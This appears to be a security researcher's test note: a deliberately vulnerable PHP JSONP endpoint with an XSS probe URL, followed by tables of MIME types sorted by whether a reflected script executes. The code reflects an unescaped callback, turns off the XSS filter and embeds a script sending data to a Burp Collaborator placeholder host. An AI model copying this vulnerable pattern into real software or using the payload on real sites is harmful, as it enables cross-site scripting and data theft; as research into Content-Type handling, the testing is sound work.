测试代码
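<?php

declare(strict_types=1);

// Deliberately vulnerable JSONP test harness: it reflects the `callback` and
// `content_type` query parameters unescaped so the same response can be probed
// under different Content-Type values (results are in the tables below).
// NEVER expose this outside an isolated lab host.
//
// Example probe (reflects a <script> tag under the Content-Type being tested):
//   http://10.211.55.8/jsonx.php?callback=%3Cscript%3Ealert(1)%3C/script%3E&content_type=text/vnd.wap.wml
//
// Hardening that is intentionally absent here, for reference when fixing a real
// endpoint:
//   - restrict `callback` to an identifier charset such as /^[A-Za-z0-9_.$]+$/,
//   - send a fixed `Content-Type: application/javascript` instead of a
//     caller-chosen one, and
//   - add `X-Content-Type-Options: nosniff` so the body is not re-interpreted
//     as HTML.

// Missing parameters default to '' instead of raising "Undefined array key"
// warnings; the resulting "Content-Type: " header matches what the original sent.
$content_type = $_GET['content_type'] ?? '';
$callback     = $_GET['callback'] ?? '';

// Headers must go out before any body bytes. The original echoed the <script>
// block first, so with output_buffering disabled both header() calls fail with
// "headers already sent", the response falls back to the default text/html, and
// the Content-Type comparison is invalidated. (With output_buffering on, as in
// php.ini-production, the original happened to work.)
// "0" switches off the legacy XSS auditor in browsers that still have one; the
// trailing ";" in the original value is not part of the header grammar.
header("X-XSS-Protection: 0");
// header() rejects values containing CR/LF, so the caller cannot inject extra
// headers this way, but everything else is passed through verbatim.
header("Content-Type: " . $content_type);

// Exfiltration helper: with callback=test the JSONP body below becomes
// test({...}) and the object is sent to the out-of-band listener. The
// burpcollaborator hostname is a placeholder for the tester's own endpoint.
echo "<script>function test(cc){location='http://m2pybxdae******9m4fff8dwlnrdf2.burpcollaborator.net/payload='+cc;}</script>";

// The unvalidated callback is the injection point under test.
print $callback . '({"id" : "1","name" : "Sariel.D"});';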
测试结果
效果
- 支持 XSS：反射的 callback 被当作 HTML 解析，`<script>` 会执行
列表
Name | Template | Reference |
---|---|---|
html | text/html | [W3C][Robin_Berjon] |
效果
- 仅返回内容，未观察到脚本执行
列表
Name | Template | Reference |
---|---|---|
ecmascript | application/ecmascript | [RFC4329] |
javascript | application/javascript | [RFC4329] |
json | application/json | [RFC8259] |
1d-interleaved-parityfec | text/1d-interleaved-parityfec | [RFC6015] |
cache-manifest | text/cache-manifest | [W3C][Robin_Berjon] |
css | text/css | [RFC2318] |
csv-schema | text/csv-schema | [National_Archives_UK][David_Underdown] |
dns | text/dns | [RFC4027] |
ecmascript - OBSOLETED in favor of application/ecmascript | text/ecmascript | [RFC4329] |
encaprtp | text/encaprtp | [RFC6849] |
example | text/example | [RFC4735] |
fwdred | text/fwdred | [RFC6354] |
grammar-ref-list | text/grammar-ref-list | [RFC6787] |
javascript - OBSOLETED in favor of application/javascript | text/javascript | [RFC4329] |
jcr-cnd | text/jcr-cnd | [Peeter_Piegaze] |
markdown | text/markdown | [RFC7763] |
n3 | text/n3 | [W3C][Eric_Prudhommeaux] |
parameters | text/parameters | [RFC7826] |
provenance-notation | text/provenance-notation | [W3C][Ivan_Herman] |
prs.fallenstein.rst | text/prs.fallenstein.rst | [Benja_Fallenstein] |
prs.lines.tag | text/prs.lines.tag | [Benja_Fallenstein] |
prs.prop.logic | text/prs.prop.logic | [Hans-Dieter_A._Hiep] |
raptorfec | text/raptorfec | [RFC6682] |
RED | text/RED | [RFC4102] |
rfc822-headers | text/rfc822-headers | [RFC6522] |
rtp-enc-aescm128 | text/rtp-enc-aescm128 | [_3GPP] |
rtploopback | text/rtploopback | [RFC6849] |
rtx | text/rtx | [RFC4588] |
sgml | text/sgml | [RFC1874] |
strings | text/strings | [IEEE-ISTO-PWG-PPP] |
t140 | text/t140 | [RFC4103] |
troff | text/troff | [RFC4263] |
turtle | text/turtle | [W3C][Eric_Prudhommeaux] |
ulpfec | text/ulpfec | [RFC5109] |
uri-list | text/uri-list | [RFC2483] |
vnd.a | text/vnd.a | [Regis_Dehoux] |
vnd.abc | text/vnd.abc | [Steve_Allen] |
vnd.ascii-art | text/vnd.ascii-art | [Kim_Scarborough] |
vnd.curl | text/vnd.curl | [Robert_Byrnes] |
vnd.debian.copyright | text/vnd.debian.copyright | [Charles_Plessy] |
vnd.DMClientScript | text/vnd.DMClientScript | [Dan_Bradley] |
vnd.dvb.subtitle | text/vnd.dvb.subtitle | [Peter_Siebert][Michael_Lagally] |
vnd.esmertec.theme-descriptor | text/vnd.esmertec.theme-descriptor | [Stefan_Eilemann] |
vnd.fly | text/vnd.fly | [John-Mark_Gurney] |
vnd.fmi.flexstor | text/vnd.fmi.flexstor | [John-Mark_Gurney] |
vnd.graphviz | text/vnd.graphviz | [John_Ellson] |
vnd.hgl | text/vnd.hgl | [Heungsub_Lee] |
vnd.in3d.3dml | text/vnd.in3d.3dml | [Michael_Powers] |
vnd.in3d.spot | text/vnd.in3d.spot | [Michael_Powers] |
vnd.IPTC.NewsML | text/vnd.IPTC.NewsML | [IPTC] |
vnd.IPTC.NITF | text/vnd.IPTC.NITF | [IPTC] |
vnd.latex-z | text/vnd.latex-z | [Mikusiak_Lubos] |
vnd.motorola.reflex | text/vnd.motorola.reflex | [Mark_Patton] |
vnd.ms-mediapackage | text/vnd.ms-mediapackage | [Jan_Nelson] |
vnd.net2phone.commcenter.command | text/vnd.net2phone.commcenter.command | [Feiyu_Xie] |
vnd.senx.warpscript | text/vnd.senx.warpscript | [Pierre_Papin] |
vnd.si.uricatalogue - OBSOLETED by request | text/vnd.si.uricatalogue | [Nicholas_Parks_Young] |
vnd.trolltech.linguist | text/vnd.trolltech.linguist | [David_Lee_Lambert] |
vnd.wap.si | text/vnd.wap.si | [WAP-Forum] |
vnd.wap.wml | text/vnd.wap.wml | [Peter_Stark] |
vnd.wap.wmlscript | text/vnd.wap.wmlscript | [Peter_Stark] |
效果
- 返回内容，但浏览器按该 Content-Type 解析时出错（页面无法正常显示，未观察到脚本执行）
列表
Name | Template | Reference |
---|---|---|
ogg | application/ogg | [RFC5334][RFC7845] |
pdf | application/pdf | [RFC8118] |
xml | application/xml | [RFC7303] |
xml | text/xml | [RFC7303] |
mp4 | audio/mp4 | [RFC4337][RFC6381] |
mpeg | audio/mpeg | [RFC3003] |
ogg | audio/ogg | [RFC5334][RFC7845] |
bmp | image/bmp | [RFC7903] |
png | image/png | [Glenn_Randers-Pehrson] |
vnd.microsoft.icon | image/vnd.microsoft.icon | [Simon_Butcher] |
x-mixed-replace | multipart/x-mixed-replace | [W3C][Robin_Berjon] |
效果